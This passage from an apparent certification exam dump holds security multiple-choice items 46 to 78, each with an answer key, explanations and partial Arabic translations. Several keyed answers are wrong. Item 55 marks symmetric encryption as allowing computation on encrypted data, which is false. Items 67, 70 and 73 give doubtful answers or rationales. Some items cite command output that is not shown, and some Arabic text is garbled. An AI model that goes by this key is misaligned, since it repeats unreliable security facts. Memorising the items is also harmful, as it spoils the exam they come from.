‫ويساور أحد كبار موظفي المعلومات القلق إزاء استخدام الموظفين لأجهزة الكمبيوتر المحمولة التي تصدرها الشركة لسرقة البيانات عند‬-46
‫ أي مما يلي يجب على الشركة تنفيذه؟‬، .‫الوصول إلى أسهم الشبكة‬
.‫) لمنع الموظفين من سرقة البيانات‬DLP( ‫يجب على الشركة تنفيذ منع فقدان البيانات‬
47. The Chief Information Security Officer wants to pilot a new adaptive, user-based
authenticationmethod. The concept Includes granting logical access based on physical
location and proximity.
Which of the following Is the BEST solution for the pilot?
A. Geofencing
B. Self-sovereign identification
C. PKl certificates
D.SSO
Answer: A
Explanation:
Geofencing is a location-based technology that allows an organization to define and enforce
logical access control policies based on physical location and proximity. Geofencing can be used
to grant or restrict access to systems, data, or facilities based on an individual's location, and it can be
integratedinto a user's device or the infrastructure.This makes it a suitable solution for the pilot project to
test the adaptive, user-based authentication method that includes granting logical access based on
physical location and proximity.
‫ يتضمن المفهوم منح الوصول المنطقي بناء على الموقع‬.‫يريد كبير مسؤولي أمن المعلومات تجربة طريقة مصادقة جديدة قائمة على المستخدم‬
.. ‫ أي مما يلي هو أفضل حل للطيار؟ السياج الجغرافي‬.‫الفعلي والقرب‬
‫ هي تقنية قائمة على الموقع تسمح للمؤسسة بتحديد وفرض سياسات التحكم في الوصول المنطقية بناء على الموقع الفعلي‬Geofencing
‫ ويمكن دمجه في جهاز‬، ‫ يمكن استخدام السياج الجغرافي لمنح أو تقييد الوصول إلى الأنظمة أو البيانات أو المرافق بناء على موقع الفرد‬.‫والقرب‬
‫ وهذا يجعله حلا مناسبا للمشروع التجريبي لاختبار طريقة المصادقة التكيفية المستندة إلى المستخدم والتي تتضمن‬.‫المستخدم أو البنية التحتية‬
.‫منح الوصول المنطقي بناء على الموقع الفعلي والقرب‬
28 / 198
The safer , easier way to help you pass any IT exams.
48. Which of the following BEST describes a social-engineering attack that relies on an executive at a
small business visiting a fake banking website where credit card and account details are harvested?
A. Whaling
B. Spam
C. Invoice scam
D. Pharming
Answer: A
Explanation:
A social engineering attack that relies on an executive at a small business visiting a fake banking website
where credit card and account details are harvested is known as whaling. Whaling is a type of phishing
attack that targets high-profile individuals, such as executives, to steal sensitive information or gain
access to their accounts.
49.A company recently experienced a major breach. An investigation concludes that customer credit
card data was stolen and exfiltrated through a dedicated business partner connection to a vendor, who is
not held to the same security contral standards.
Which of the following is the MOST likely source of the breach?
A. Side channel
B. Supply chain
C. Cryptographic downgrade
D. Malware
Answer: B
Explanation:
A supply chain attack occurs when a third-party supplier or business partner is compromised, leading to
an attacker gaining unauthorized access to the targeted organization's network. In this scenario, the
dedicated business partner connection to a vendor was used to exfiltrate customer credit card data,
indicating that the vendor's network was breached and used as a supply chain attack vector.
29 / 198
The safer , easier way to help you pass any IT exams.
50. During a security assessment, a security finds a file with overly permissive permissions.
Which of the following tools will allow the analyst to reduce the permission for the existing users
andgroups and remove the set-user-ID from the file?
A. 1s
B. chflags
C. chmod
D.lsof
E. setuid
Answer: C
Explanation:
The chmod command is used to change the permissions of a file or directory. The analyst can use
chmod to reduce the permissions for existing users and groups and remove the set-user-ID bit from
the file.
‫ أي من الأدوات التالية ستسمح للمحلل بتقليل الإذن للمستخدمين‬.‫ يعثر الأمان على ملف بأذونات متساهلة بشكل مفرط‬،‫أثناء تقييم الأمان‬
‫والمجموعات الحالية وإزالة معرف المستخدم المحدد من الملف؟شمود‬
‫ لتقليل الأذونات للمستخدمين والمجموعات الحالية‬chmod ‫ يمكن للمحلل استخدام‬.‫ لتغيير أذونات ملف أو دليل‬chmod ‫ يتم استخدام الأمر‬:‫تفسير‬
.‫وإزالة بت معرف المستخدم المحدد من الملف‬
51. During an incident a company CIRT determine it is necessary to observe the continued
network-based transaction between a callback domain and the malware running on an
enterprise PC.
Which of the following techniques would be BEST to enable this activity while reducing the risk of
lateral spread and the risk that the adversary would notice any changes?
A. Physical move the PC to a separate internet pint of presence
B. Create and apply micro segmentation rules.
C. Emulate the malware in a heavily monitored DMZ segment.
D. Apply network blacklisting rules for the adversary domain
Answer: C
Explanation:
To observe the continued network-based transaction between a callback domain and the malware
running on an enterprise PC while reducing the risk of lateral spread and the risk that the
adversary would notice any changes, the best technique to use is to emulate the malware in a
heavily monitoredDMZ segment. This is a secure environment that is isolated from the rest of the
network and can be heavily monitored to detect any suspicious activity. By emulating the malware in
this environment, theactivity can be observed without the risk of lateral spread or detection by the
adversary.
‫ أنه من الضروري مراقبة المعاملة المستمرة المستندة إلى الشبكة بين مجال رد الاتصال‬CIRT ‫ تقرر شركة‬، ‫أثناء وقوع حادث‬
‫ أي من التقنيات التالية سيكون الأفضل لتمكين هذا النشاط مع تقليل‬.‫والبرامج الضارة التي تعمل على جهاز كمبيوتر مؤسسي‬
‫ مراقب بشدة‬DMZ ‫مخاطر الانتشار الجانبي وخطر ملاحظة الخصم لأي تغييرات؟ محاكاة البرامج الضارة في قطاع‬
30 / 198
The safer , easier way to help you pass any IT exams.
52. During an incident, a company's CIRT determines it is necessary to observe the continued network-
based transactions between a callback domain and the malware running on an enterprise PC.
Which of the following techniques would be BEST to enable this activity while reducing the risk of lateral
spread and the risk that the adversary would notice any changes?
A. Physically move the PC to a separate Internet point of presence.
B. Create and apply micro segmentation rules,
C. Emulate the malware in a heavily monitored DMZ segment
D. Apply network blacklisting rules for the adversary domain
Answer: C
Explanation:
Emulating the malware in a heavily monitored DMZ segment is the best option for observing
network- based transactions between a callback domain and the malware running on an
enterprise PC. This approach provides an isolated environment for the malware to run, reducing the
risk of lateral spread and detection by the adversary. Additionally, the DMZ can be monitored closely to
gather intelligence onthe adversary's tactics and techniques.
‫ يقرر فريق الاستجابة للحوادث الحاسوبية التابع للشركة أنه من الضروري مراقبة المعاملات المستمرة القائمة على الشبكة بين‬، ‫أثناء وقوع حادث‬
‫ أي من التقنيات التالية سيكون الأفضل لتمكين هذا النشاط مع تقليل‬.‫مجال رد الاتصال والبرامج الضارة التي تعمل على جهاز كمبيوتر المؤسسة‬
‫ الخاضع للمراقبة الشديدة‬DMZ ‫مخاطر الانتشار الجانبي وخطر ملاحظة الخصم لأي تغييرات؟ محاكاة البرامج الضارة في قطاع‬
53. Which of the following BEST describes the team that acts as a referee during a penetration-testing
exercise?
A. White team
B. Purple team
C. Green team
D. Blue team
E. Red team
Answer: A
Explanation:
During a penetration testing exercise, the white team is responsible for acting as a referee and
providingoversight and support to ensure that the testing is conducted safely and effectively. They may
also be responsible for determining the rules and guidelines of the exercise, monitoring the progress of
the teams, and providing feedback and insights on the strengths and weaknesses of the organization's
security measures.
‫أي من أفضل ما يلي يصف الفريق الذي يعمل كحكم أثناء تمرين اختبار الاختراق؟ الفريق الابيض‬
‫ قد يكونون‬.‫ يكون الفريق الأبيض مسؤولا عن العمل كحكم وتوفير الإشراف والدعم لضمان إجراء الاختبار بأمان وفعالية‬، ‫أثناء تمرين اختبار الاختراق‬
‫ وتقديم التعليقات والرؤى حول نقاط القوة والضعف في‬، ‫ ورصد تقدم الفرق‬، ‫مسؤولين أيضا عن تحديد القواعد والمبادئ التوجيهية للتمرين‬
.‫التدابير الأمنية للمنظمة‬
31 / 198
The safer , easier way to help you pass any IT exams.
54.A security engineer is hardening existing solutions to reduce application
vulnerabilities.Which of the following solutions should the engineer implement
FIRST? (Select TWO)
A. Auto-update
B. HTTP headers
C. Secure cookies
D. Third-party updates
E. Full disk encryption
F. Sandboxing
G. Hardware encryption
Answer: A,F
Explanation:
Auto-update can help keep the app up-to-date with the latest security fixes and enhancements, and
reduce the risk of exploitation by attackers who target outdated or vulnerable versions of the app.
Sandboxing can help isolate the app from other processes and resources on the system,
and limit its access and permissions to only what is necessary. Sandboxing can help prevent the app
from being affected by or affecting other applications or system components, and contain any potential
damage in case of a breach.
‫ أي من الحلول التالية يجب على‬.‫يعمل مهندس أمن على تقوية الحلول القائمة للحد من مواطن الضعف في التطبيقات‬-54
‫ تشفير القرص بالكامل‬, ‫المهندس تنفيذه أولا؟ (اختر اثنين) التحديث التلقائي‬
55.A financial institution would like to store its customer data in a cloud but still allow the data to be
accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from
being able to decipher the data due to its sensitivity. The financial institution is not concerned about
computational overheads and slow speeds.
Which of the following cryptographic techniques would BEST meet the requirement?
A. Asymmetric
B. Symmetric
C. Homomorphic
D. Ephemeral
Answer: B
Explanation:
Symmetric encryption allows data to be encrypted and decrypted using the same key. This is useful
when the data needs to be accessed and manipulated while still encrypted.
‫ سيؤدي القيام‬.‫وتود مؤسسة مالية أن تخزن بيانات زبائنها في سحابة ولكنها تسمح مع ذلك بالوصول إلى البيانات ومعالجتها أثناء تشفيرها‬-55
‫ لا تهتم المؤسسة المالية بالنفقات العامة الحسابية‬.‫بذلك إلى منع مزود الخدمة السحابية من القدرة على فك تشفير البيانات بسبب حساسيتها‬
‫ أي من تقنيات التشفير التالية ستلبي المتطلبات بشكل أفضل؟‬.‫والسرعات البطيئة‬
‫ يكون هذا مفيدا عندما تحتاج البيانات إلى الوصول إليها ومعالجتها‬.‫يسمح التشفير المتماثل بتشفير البيانات وفك تشفيرها باستخدام نفس المفتاح‬
.‫بينما لا تزال مشفرة‬
32 / 198
The safer , easier way to help you pass any IT exams.
56. An organization discovered a disgruntled employee exfiltrated a large amount of PII data
byuploading files.
Which of the following controls should the organization consider to mitigate this risk?
A. EDR
B. Firewall
C. HIPS
D. DLP
Answer: D
Explanation:
DLP stands for data loss prevention,
‫ أي‬.‫اكتشفت إحدى المؤسسات أن موظفا ساخطا قام بسرقة كمية كبيرة من بيانات معلومات تحديد الهوية الشخصية عن طريق تحميل الملفات‬
‫من الضوابط التالية يجب على المنظمة مراعاتها للتخفيف من هذا الخطر؟‬
57.A security administrator is working on a solution to protect passwords stored in a database against
rainbow table attacks.
Which of the following should the administrator consider?
A. Hashing
B. Salting
C. Lightweight cryptography
D. Steganography
Answer: B
Explanation:
Salting is a technique that adds random data to a password before hashing it.
‫ أي مما يلي يجب على‬.‫يعمل مسؤول الأمن على إيجاد حل لحماية كلمات السر المخزنة في قاعدة بيانات من هجمات جداول قوس قزح‬-57
‫المسؤول مراعاته؟ التمليح‬
.‫التمليح هو تقنية تضيف بيانات عشوائية إلى كلمة المرور قبل تجزئتها‬
58. Which of the following incident response steps occurs before containment?
A. Eradication
B. Recovery
C. Lessons learned
D. Identification
Answer: D
Explanation:
Identification is the first step in the incident response process, which involves recognizing that an
incident has occurred. Containment is the second step, followed by eradication, recovery, and
lessons learned.
.‫أي من خطوات الاستجابة للحوادث التالية تحدث قبل الاحتواء‬
33 / 198
The safer , easier way to help you pass any IT exams.
59. Employees at a company are receiving unsolicited text messages on their corporate cell
phones. The unsolicited text messages contain a password reset Link.
Which of the attacks is being used to target the company?
A. Phishing
B. Vishing
C. Smishing
D. Spam
Answer: C
Explanation:
Smishing is a type of phishing attack which begins with an attacker sending a text message to an
individual.
‫ تحتوي الرسائل النصية غير المرغوب فيها على رابط‬.‫يتلقى الموظفون في الشركة رسائل نصية غير مرغوب فيها على هواتفهم المحمولة للشركات‬
‫ أي من الهجمات تستخدم لاستهداف الشركة؟ التصيد الاحتيالي‬.‫إعادة تعيين كلمة المرور‬
.‫التصيد الاحتيالي هو نوع من هجمات التصيد الاحتيالي التي تبدأ بإرسال مهاجم رسالة نصية إلى فرد‬
60. Which of the following would MOST likely be identified by a credentialed scan but would be missed by
an uncredentialed scan?
A. Vulnerabilities with a CVSS score greater than 6.9.
B. Critical infrastructure vulnerabilities on non-IP protocols.
C. CVEs related to non-Microsoft systems such as printers and switches.
D. Missing patches for third-party software on Windows workstations and servers.
Answer: D
Explanation:
An uncredentialed scan would miss missing patches for third-party software on Windows
workstations and servers. A credentialed scan, however, can scan the registry and file system to
determine the patchlevel of third-party applications.
‫أي مما يلي من المرجح أن يتم تحديده من خلال فحص معتمد ولكن سيتم تفويته بواسطة فحص غير معتمد؟‬
‫تصحيحات مفقودة لبرامج الجهات الخارجية على محطات عمل ويندوز والخوادم‬
61. one of the attendees starts to notice delays in the connection. and the HTTPS site requests are
reverting to HTTP.
Which of the following BEST describes what is happening?
A. Birthday collision on the certificate key
B. DNS hacking to reroute traffic
C. Brute force to the access point
D. A SSL/TLS downgrade
Answer: D
Explanation:
The scenario describes a Man-in-the-Middle (MitM) attack where the attacker intercepts traffic and
downgrades the secure SSL/TLS connection to an insecure HTTP connection. This type of attack
is commonly known as SSL/TLS downgrade attack or a stripping attack. The attacker is able to see and
modify the communication between the client and server.
‫ أي مما يلي يصف ما يحدث؟‬.HTTP ‫ إلى‬HTTPS ‫ وتعود طلبات موقع‬.‫يبدأ أحد الحاضرين في ملاحظة التأخير في الاتصال‬
TLS/SSL ‫الرجوع إلى إصدار أقدم من‬
‫ غير آمن‬HTTP ‫ الآمن إلى اتصال‬TLS / SSL ‫يعترض المهاجم حركة المرور ويقلل من اتصال‬
34 / 198
The safer , easier way to help you pass any IT exams.
62. Which of the following biometric authentication methods is the MOST accurate?
A. Gait
B. Retina
C. Signature
D. Voice
Answer: B
Explanation:
Retina authentication is the most accurate biometric authentication method..
‫أي من طرق المصادقة البيومترية التالية هي الأكثر دقة؟ الشبكيه‬
63.A user attempts to load a web-based application, but the expected login screen does not appear
A help desk analyst troubleshoots the issue by running the following command and reviewing the
output on the user's PC
The help desk analyst then runs the same command on the local PC
Which of the following BEST describes the attack that is being detected?
A. Domain hijacking
B DNS poisoning
C MAC flooding
D. Evil twin
Answer: B
Explanation:
DNS poisoning, also known as DNS spoofing or DNS cache poisoning, is a form of computer security
hacking in which corrupt Domain Name System (DNS) data is introduced into the DNS resolver’s cache,
causing the name server to return an incorrect result record, such as an IP address. This results in traffic
being diverted to the attacker’s computer (or any other malicious destination).
‫ ولكن لا تظهر شاشة تسجيل الدخول المتوقعة يقوم محلل مكتب‬،‫يحاول مستخدم تحميل تطبيق مستند إلى الويب‬.63
‫المساعدة باستكشاف المشكلة وإصلاحها عن طريق تشغيل الأمر التالي ومراجعة الإخراج على جهاز الكمبيوتر الخاص‬
‫بالمستخدم‬
‫ثم يقوم محلل مكتب المساعدة بتشغيل نفس الأمر على الكمبيوتر المحلي أي مما يلي يصف الهجوم الذي يتم اكتشافه؟‬
DNS ‫تسمم‬
‫ هو شكل من‬، ‫ أو تسمم ذاكرة التخزين المؤقت لنظام أسماء النطاقات‬DNS ‫ المعروف أيضا باسم انتحال‬، DNS ‫شرح \ تسمم‬
‫) الفاسدة في ذاكرة التخزين المؤقت لمحلل‬DNS( ‫أشكال اختراق أمان الكمبيوتر حيث يتم إدخال بيانات نظام اسم المجال‬
‫ ينتج عن هذا تحويل حركة المرور إلى‬.IP ‫ مثل عنوان‬، ‫ مما يتسبب في قيام خادم الأسماء بإرجاع سجل نتائج غير صحيح‬، DNS
.)‫كمبيوتر المهاجم (أو أي وجهة ضارة أخرى‬
35 / 198
The safer , easier way to help you pass any IT exams.
64. An organization wants seamless authentication to its applications.
Which of the following should the organization employ to meet this requirement?
A. SOAP
B. SAML
C. SSO
D. Kerberos
Answer: C
Explanation:
Single Sign-On (SSO) is a mechanism that allows users to access multiple applications with a
single setof login credentials.
‫ أي مما يلي يجب أن تستخدمه المنظمة لتلبية هذا المطلب؟ صابون سامل‬.‫تريد المؤسسة مصادقة سلسة لتطبيقاتها‬
‫اس اس اوو‬: ‫تسجيل الدخول الأحادي إجابة‬
‫) هو آلية تسمح للمستخدمين بالوصول إلى تطبيقات متعددة باستخدام مجموعة واحدة‬SSO( ‫ تسجيل الدخول الأحادي‬: ‫شرح‬
.‫من بيانات اعتماد تسجيل الدخول‬
65. Certain users are reporting their accounts are being used to send unauthorized emails and
conductsuspicious activities.
After further investigation, a security analyst notices the following:
• All users share workstations throughout the day.
• Endpoint protection was disabled on several workstations throughout the network.
• Travel times on logins from the affected users are impossible.
• Sensitive data is being uploaded to external sites.
• All user account passwords were forced to be reset and the issue continued.
Which of the following attacks is being used to compromise the user accounts?
A. Brute-force
B. Key logger
C. Dictionary
D. Rainbow
Answer: B
Explanation:
The symptoms suggest a key logger is being used to compromise the user accounts, allowing the
attackers to obtain the users' passwords and other sensitive information.
.‫أبلغ بعض المستخدمين عن استخدام حساباتهم لإرسال رسائل بريد إلكتروني غير مصرح بها وإجراء أنشطة مشبوهة‬
:‫ يلاحظ محلل أمني ما يلي‬، ‫بعد مزيد من التحقيق‬
‫ تم تعطيل حماية نقطة النهاية على العديد من محطات العمل في‬.‫يشارك جميع المستخدمين محطات العمل على مدار اليوم‬
‫ يتم تحميل البيانات الحساسة‬.‫ أوقات السفر على تسجيلات الدخول من المستخدمين المتأثرين مستحيلة‬.‫جميع أنحاء الشبكة‬
.‫ تم فرض إعادة تعيين جميع كلمات مرور حساب المستخدم واستمرت المشكلة‬.‫إلى مواقع خارجية‬
. ‫أي من الهجمات التالية يتم استخدامها لاختراق حسابات المستخدمين؟ مسجل المفاتيح‬
‫ مما يسمح للمهاجمين بالحصول على كلمات مرور‬، ‫ لاختراق حسابات المستخدمين‬keylogger ‫تشير الأعراض إلى استخدام‬
.‫المستخدمين وغيرها من المعلومات الحساسة‬
36 / 198
The safer , easier way to help you pass any IT exams.
66.A company's public-facing website, https://www.organization.com, has an IP address of 166.18.75.6.
However, over the past hour the SOC has received reports of the site's homepage displaying incorrect
information. A quick nslookup search shows hitps://;www.organization.com is pointing to
151.191.122.115.
Which of the following is occurring?
A. DoS attack
B. ARP poisoning
C. DNS spoofing
D. NXDOMAIN attack
Answer: C
Explanation:
The issue is DNS spoofing, where the DNS resolution has been compromised and is pointing to a
malicious IP address.
‫ تلقت‬، ‫ على مدار الساعة الماضية‬، ‫ ومع ذلك‬.166.18.75.6 ‫ هو‬IP ‫ له عنوان‬، ‫ موقع الويب العام للشركة‬، https://www.organization.com -66
‫ يشير‬com.organisation.www;//:hitps ‫ السريع أن‬nslookup ‫ يظهر بحث‬.‫ تقارير عن الصفحة الرئيسية للموقع تعرض معلومات غير صحيحة‬SOC
‫ أي من الآتي يحدث؟‬.151.191.122.115 ‫إلى‬
.‫ ضار‬IP ‫ وتشير إلى عنوان‬DNS ‫ حيث تم اختراق دقة‬، DNS ‫المشكلة هي انتحال‬
67.A Chief Information Officer receives an email stating a database will be encrypted within 24 hours
unless a payment of $20,000 is credited to the account mentioned In the email.
This BEST describes a scenario related to:
A. whaling.
B. smishing.
C. spear phishing
D. vishing
Answer: C
Explanation:
The scenario of receiving an email stating a database will be encrypted unless a payment is made is an
example of spear phishing.
‫ يتلقى كبير موظفي المعلومات رسالة بريد إلكتروني تفيد بأنه سيتم تشفير قاعدة البيانات في‬:‫ يصف هذا سيناريو متعلقا بما يلي‬.‫ دولار إلى الحساب المذكور في البريد الإلكتروني‬20000 ‫ ساعة ما لم يتم إضافة دفعة قدرها‬24 ‫غضون‬
‫ ج‬:‫ التصيد الاحتيالي بالرمح الجواب‬.‫ التصيد الاحتيالي‬.‫الحيتان‬
.‫ يعد سيناريو تلقي بريد إلكتروني يفيد بأنه سيتم تشفير قاعدة بيانات ما لم يتم إجراء الدفع مثالا على التصيد الاحتيالي بالرمح‬:‫التفسير‬
37 / 198
The safer , easier way to help you pass any IT exams.
68. An analyst Is generating a security report for the management team. Security guidelines recommend
disabling all listening unencrypted services.
Given this output from Nmap:
Which of the following should the analyst recommend to disable?
A. 21/tcp
B. 22/tcp
C. 23/tcp
D. 443/tcp
Answer: A
.‫ توصي إرشادات الأمان بتعطيل جميع خدمات الاستماع غير المشفرة‬.‫يقوم المحلل بإنشاء تقرير أمان لفريق الإدارة‬
‫ اي مما يلي يجب أن يوصي المحلل بتعطيله؟‬:Nmap ‫بالنظر إلى هذا الناتج من‬
69. Which of the following would be BEST for a technician to review to determine the total risk an
organization can bear when assessing a "cloud-first" adoption strategy?
A. Risk matrix
B. Risk tolerance
C. Risk register
D. Risk appetite
Answer: B
Explanation:
To determine the total risk an organization can bear, a technician should review the organization's risk
tolerance, which is the amount of risk the organization is willing to accept. This information will help
determine the organization's "cloud-first" adoption strategy.
‫أي مما يلي سيكون الأفضل للفني لمراجعته لتحديد إجمالي المخاطر التي يمكن أن تتحملها المؤسسة عند تقييم استراتيجية اعتماد "السحابة أولا"؟‬
‫تحمل المخاطر‬
‫ وهو مقدار المخاطر التي ترغب‬، ‫ يجب على الفني مراجعة تحمل المنظمة للمخاطر‬، ‫لتحديد إجمالي المخاطر التي يمكن أن تتحملها المنظمة‬
.‫ ستساعد هذه المعلومات في تحديد استراتيجية اعتماد "السحابة أولا" للمؤسسة‬.‫المنظمة في قبولها‬
38 / 198
The safer , easier way to help you pass any IT exams.
70.A help desk technician receives an email from the Chief Information Officer (CIO) asking for
documents. The technician knows the CIO is on vacation for a few weeks.
Which of the following should the technician do to validate the authenticity of the email?
A. Check the metadata in the email header of the received path in reverse order to follow the email’s
path.
B. Hover the mouse over the CIO's email address to verify the email address.
C. Look at the metadata in the email header and verify the "From." line matches the CIO's email
address.
D. Forward the email to the CIO and ask if the CIO sent the email requesting the documents.
Answer: B
‫ يعرف الفني أن رئيس قسم‬.‫ويتلقى أحد فنيي مكتب المساعدة رسالة إلكترونية من كبير موظفي المعلومات يطلب فيها تقديم وثائق‬-70
‫ أي مما يلي يجب على الفني القيام به للتحقق من صحة البريد الإلكتروني؟‬.‫المعلومات في إجازة لبضعة أسابيع‬
.‫مرر مؤشر الماوس فوق عنوان البريد الإلكتروني لرئيس قسم المعلومات للتحقق من عنوان البريد الإلكتروني‬
71. Which of the following is the MOST secure but LEAST expensive data destruction method for data
that is stored on hard drives?
A. Pulverizing
B. Shredding
C. Incinerating
D. Degaussing
Answer: B
Explanation:
Shredding may be the most secure and cost-effective way to destroy electronic data in any
media thatcontain hard drives or solid-state drives and have reached their end-of-life1. Shredding
reduces electronic devices to pieces no larger than 2 millimeters2. Therefore, shredding is the most
secure butleast expensive data destruction method for data that is stored on hard drives.
‫أي مما يلي هو طريقة تدمير البيانات الأكثر أمانا ولكن الأقل تكلفة للبيانات المخزنة على محركات الأقراص الثابتة؟ تمزيق‬
72.A business is looking for a cloud service provider that offers a la carte services, including cloud
backups, VM elasticity, and secure networking.
Which of the following cloud service provider types should business engage?
A. A laaS
B. PaaS
C. XaaS
D. SaaS
Answer: A
Explanation:
Infrastructure as a Service (IaaS) providers offer a la carte services, including cloud backups, VM
elasticity, and secure networking. With IaaS, businesses can rent infrastructure components such as
virtual machines, storage, and networking from a cloud service provider.
‫ ومرونة الأجهزة‬،‫ بما في ذلك النسخ الاحتياطية السحابية‬،‫تبحث إحدى الشركات عن مقدم خدمات سحابية يقدم خدمات انتقائية‬-72
‫ أي من أنواع موفري الخدمات السحابية التالية يجب أن تشارك فيها الأعمال؟ لام الف الف اس‬.‫ والشبكات الآمنة‬،‫الافتراضية‬
، IaaS ‫ باستخدام‬.‫ والشبكات الآمنة‬VM ‫ بما في ذلك النسخ الاحتياطية السحابية ومرونة‬، ‫) خدمات انتقائية‬IaaS( ‫يقدم موفرو البنية التحتية كخدمة‬
.‫يمكن للشركات استئجار مكونات البنية التحتية مثل الأجهزة الافتراضية والتخزين والشبكات من مزود خدمة سحابية‬
39 / 198
The safer , easier way to help you pass any IT exams.
73.A large enterprise has moved all its data to the cloud behind strong authentication and encryption. A
sales director recently had a laptop stolen, and later, enterprise data was found to have been
compromised from a local database.
Which of the following was the MOST likely cause?
A. Shadow IT
B. Credential stuffing
C. SQL injection
D. Man in the browser
E. Bluejacking
Answer: A
Explanation:
The most likely cause of the enterprise data being compromised from a local database is Shadow IT.
Shadow IT is the use of unauthorized applications or devices by employees to access company
resources. In this case, the sales director's laptop was stolen, and the attacker was able to use it to
access the local database, which was not secured properly, allowing unauthorized access to sensitive
data.
‫ وفي وقت‬، ‫ تعرض مدير مبيعات مؤخرا لسرقة جهاز كمبيوتر محمول‬.‫نقلت مؤسسة كبيرة جميع بياناتها إلى السحابة وراء توثيق وتشفير قويين‬-73
‫ أي مما يلي هو السبب الأكثر احتمالا؟ شادو آي تي‬.‫ تم العثور على بيانات المؤسسة قد تم اختراقها من قاعدة بيانات محلية‬، ‫لاحق‬
‫توضيح‬:
‫السبب األكثر احتماالً لحدوث اختراق لبيانات المؤسسة من قاعدة بيانات محلية هو شادو آي تي‬
74. Which of the following BEST describes a technique that compensates researchers for finding
vulnerabilities?
A. Penetration testing
B. Code review
C. Wardriving
D. Bug bounty
Answer: D
Explanation:
A bug bounty is a technique that compensates researchers for finding vulnerabilities in software
or systems. A bug bounty program is an initiative that offers rewards, usually monetary, to ethical
hackers who report security flaws to the owners or developers of the software or system. Bug bounty
programs are often used by companies such as Meta (formerly Facebook), Google, Microsoft, and
others to improve the security of their products and services Bug bounty programs compensate
researchers, oftenfinancially, for finding vulnerabilities in software, websites, or other technology. These
programs provide an additional layer of security testing and incentivize researchers to report
vulnerabilities instead of exploiting them.
‫أي مما يلي أفضل وصف لتقنية تعوض الباحثين عن اكتشاف الثغرات األمنية؟‬
‫مكافأة الخطأ‬
‫توضيح‬
‫هي تقنية تعوض الباحثين عن اكتشاف نقاط الضعف في البرامج أو األنظمة‬.
40 / 198
The safer , easier way to help you pass any IT exams.
75. After a phishing scam fora user's credentials, the red team was able to craft payload to deploy on a
server. The attack allowed the installation of malicious software that initiates a new remote session
Which of the following types of attacks has occurred?
A. Privilege escalation
B. Session replay
C. Application programming interface
D. Directory traversal
Answer: A
Explanation:
"Privilege escalation is the act of exploiting a bug, design flaw, or configuration oversight in an operating
system or software application to gain elevated access to resources that are normally protected from an
application or user." In this scenario, the red team was able to install malicious software, which would
require elevated privileges to access and install. Therefore, the type of attack that occurred is privilege
escalation.
‫ تمكن الفريق األحمر من إنشاء حمولة لنشرها على الخادم أتاح الهجوم تثبيت برامج ضارة تبدأ‬، ‫بعد خداع التصيد االحتيالي لبيانات اعتماد المستخدم‬
.‫جلسة عمل بعيدة جديدة‬
‫أي من أنواع الهجمات التالية قد حدث؟‬
‫التصعيد امتياز‬
" ‫تصعيد االمتياز هو فعل استغالل خطأ أو عيب في التصميم أو اإلشراف على التكوين في نظام تشغيل أو تطبيق برمجي للحصول على وصول مرتفع‬
‫إلى الموارد المحمية عادة ً من تطبيق أو مستخدم‬
76.A developer is building a new portal to deliver single-pane-of-glass management capabilities to
customers with multiple firewalls. To Improve the user experience, the developer wants to implement an
authentication and authorization standard that uses security tokens that contain assertions to pass user
Information between nodes.
Which of the following roles should the developer configure to meet these requirements? (Select TWO).
A. Identity processor
B. Service requestor
C. Identity provider
D. Service provider
Answer: C,D
Explanation:
An identity provider (IdP) is responsible for authenticating users and generating security tokens
containing user information. A service provider (SP) is responsible for accepting security tokens and
granting access to resources based on the user's identity.
‫ لتحسين‬.‫يقوم أحد المطورين ببناء بوابة جديدة لتوفير قدرات إدارة أحادية اللوحة للعملاء الذين لديهم جدران حماية متعددة‬-76
‫ يريد المطور تنفيذ معيار مصادقة وتخويل يستخدم رموز الأمان المميزة التي تحتوي على تأكيدات لتمرير‬،‫تجربة المستخدم‬
.)‫ أي من الأدوار التالية يجب على المطور تكوينه لتلبية هذه المتطلبات؟ (اختر اثنين‬.‫معلومات المستخدم بين العقد‬
‫ مقدم الخدمة‬, ‫ موفر الهوية‬: ‫الأجابه‬
‫) مسؤولا عن مصادقة المستخدمين وإنشاء رموز الأمان المميزة التي تحتوي على معلومات‬IdP( ‫يكون موفر الهوية‬
.‫) مسؤولا عن قبول رموز الأمان ومنح الوصول إلى الموارد بناء على هوية المستخدم‬SP( ‫ يكون مزود الخدمة‬.‫المستخدم‬
41 / 198
The safer , easier way to help you pass any IT exams.
77.A security analyst has received several reports of an issue on an internal web application. Users state
they are having to provide their credentials twice to log in. The analyst checks with the application team
and notes this is not an expected behavior.
After looking at several logs, the analyst decides to run some commands on the gateway and obtains the
following output:
Which of the following BEST describes the attack the company is experiencing?
A. MAC flooding
B. URL redirection
C. ARP poisoning
D. DNS hijacking
Answer: C
Explanation:
The output of the “netstat -ano” command shows that there are two connections to the same IP address
and port number. This indicates that there are two active sessions between the client and server.
The issue of users having to provide their credentials twice to log in is known as a double login prompt
issue. This issue can occur due to various reasons such as incorrect configuration of authentication
settings, incorrect configuration of web server settings, or issues with the client’s browser.
Based on the output of the “netstat -ano” command, it is difficult to determine the exact cause of the
issue. However, it is possible that an attacker is intercepting traffic between the client and server and
stealing user credentials. This type of attack is known as C. ARP poisoning.
ARP poisoning is a type of attack where an attacker sends fake ARP messages to associate their MAC
address with the IP address of another device on the network. This allows them to intercept traffic
between the two devices and steal sensitive information such as user credentials.
‫ يذكر المستخدمون أنه يتعين عليهم تقديم بيانات‬.‫تلقى محلل أمني عدة تقارير عن مشكلة في تطبيق و يب داخلي‬-77
‫ بعد النظر في العديد‬.‫ يتحقق المحلل مع فريق التطبيق و يلاحظ أن هذا ليس سلوكا متوقعا‬.‫اعتمادهم مرتين لتسجيل الدخول‬
‫ أي مما يلي يصف الهجوم الذي‬:‫ يقرر المحلل تشغيل بعض الأوامر على البوابة والحصول على الإخراج التالي‬، ‫من السجلات‬
ARP ‫تتعرض له الشركة؟ تسمم‬
‫ لجهاز آخر على‬IP ‫ الخاص به بعنوان‬MAC ‫ مزيفة لربط عنوان‬ARP ‫ هو نوع من الهجوم حيث يرسل المهاجم رسائل‬ARP ‫تسمم‬
.‫ يتيح لهم ذلك اعتراض حركة المرور بين الجهازين وسرقة المعلومات الحساسة مثل بيانات اعتماد المستخدم‬.‫الشبكة‬
42 / 198
The safer , easier way to help you pass any IT exams.
78.A dynamic application vulnerability scan identified code injection could be performed using a web
form.
Which of the following will be BEST remediation to prevent this vulnerability?
A. Implement input validations
B. Deploy MFA
C. Utilize a WAF
D. Configure HIPS
Answer: A
Explanation:
Implementing input validations will prevent code injection attacks by verifying the type and format of user
input.
